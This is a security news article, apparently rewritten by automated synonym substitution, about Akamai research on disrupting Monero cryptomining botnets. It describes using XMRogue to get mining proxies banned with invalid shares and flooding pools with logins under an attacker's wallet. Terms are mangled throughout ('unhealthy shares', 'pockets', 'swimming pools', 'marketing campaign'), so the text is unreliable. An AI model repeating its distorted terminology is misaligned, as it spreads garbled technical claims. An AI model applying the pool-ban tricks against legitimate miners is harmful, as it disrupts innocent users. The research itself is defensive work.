Disrupting the operations of cryptocurrency mining botnets
June 25, 2025 
Cybersecurity researchers devised two assault methods to disrupt the operations of cryptocurrency mining botnets.
Akamai Researchers uncovered two novel methods to disrupt cryptocurrency mining botnets by exploiting flaws in widespread mining topologies.
Present strategies to cease cryptocurrecy mining botnets are pool bans or infrastructure takedowns, nevertheless, each are sluggish and sophisticated. Researchers developed two quicker methods exploiting vulnerabilities in the stratum protocol to disrupt operations by focusing on proxies or wallets, probably forcing attackers to desert campaigns.
“We developed two methods by leveraging the mining topologies and pool insurance policies that allow us to cut back a cryptominer botnet’s effectiveness to the level of fully shutting it down, which forces the attacker to make radical modifications to their infrastructure and even abandon the total marketing campaign.” reads the report revealed by Akamai.
Researchers developed XMRogue, a device to disrupt cryptomining botnets utilizing mining proxies. XMRogue permits researchers to impersonate a miner, hook up with a mining proxy, submit consecutive unhealthy shares (invalid mining job outcomes), and probably ban the mining proxy from the pool.
“When mining utilizing a proxy, all the victims are related to a single server, which implies that interfering with the proxy can carry the total mining operation down.” continues the report. “The concept is straightforward: By connecting to a malicious proxy as a miner, we will submit invalid mining job outcomes — unhealthy shares — that may bypass the proxy validation and can be submitted to the pool. Consecutive unhealthy shares will ultimately get the proxy banned, successfully halting mining operations for the total cryptomining botnet.”
By sending crafted invalid shares (unhealthy hashes) by means of Stratum to malicious proxies, they set off pool-level bans, halting the attacker’s operation. XMRogue bypasses proxy validations by accurately formatting share fields.
In exams performed by Akamai, it lowered one marketing campaign’s annual income from $50K to $12K, a 76% drop, by banning proxies, probably forcing attackers to desert the marketing campaign.
Akamai’s second methodology targets miners related on to public swimming pools with out proxies. By flooding the pool with over 1,000 login makes an attempt utilizing the attacker’s pockets, the pockets will get briefly banned for an hour. Although not everlasting, this disruption can considerably hinder the assault. The researchers demonstrated the approach focusing on Monero miners, nevertheless, it’s adaptable to different cryptocurrencies.
“Once we inspected the mining pool’s source code, an alternative choice got here to thoughts — focusing on the pockets tackle. Whereas the earlier unhealthy shares coverage focused miner IP addresses, we recognized an extra coverage that’s enforced on the pockets degree — the pool will ban the pockets’s tackle for one hour if it has more than 1,000 workers.” continues the report. “When utilizing proxy mining, an attacker can embed their pockets tackle completely on the proxy server, enabling them to successfully masquerade it. However in conditions the place direct mining is carried out, the pockets tackle have to be current on the sufferer machine, which permits us to extract it. Getting the attacker banned on this case is easy — we simply ship greater than 1,000 login requests utilizing the attacker’s pockets concurrently, which can drive the pool to ban the attacker’s pockets.”
The researchers applied this second assault approach in the XMRogue device
The methods above reveal how defenders can disrupt malicious cryptominer campaigns by exploiting mining pool insurance policies, with out affecting reliable miners. Whereas a reliable person can rapidly get better by altering their IP or pockets, attackers face a a lot greater problem. Shutting down a malicious marketing campaign would require modifications throughout the total botnet, making this protection particularly efficient towards much less subtle operations.
“We consider that the menace of cryptominers will proceed to develop over time. However now we will struggle again and disrupt the attacker’s operation, making it rather more difficult to monetize cryptominers successfully” concludes the report.
Observe me on Twitter: @securityaffairs and Facebook and Mastodon
(SecurityAffairs – hacking, cryptocurrency mining botnets)
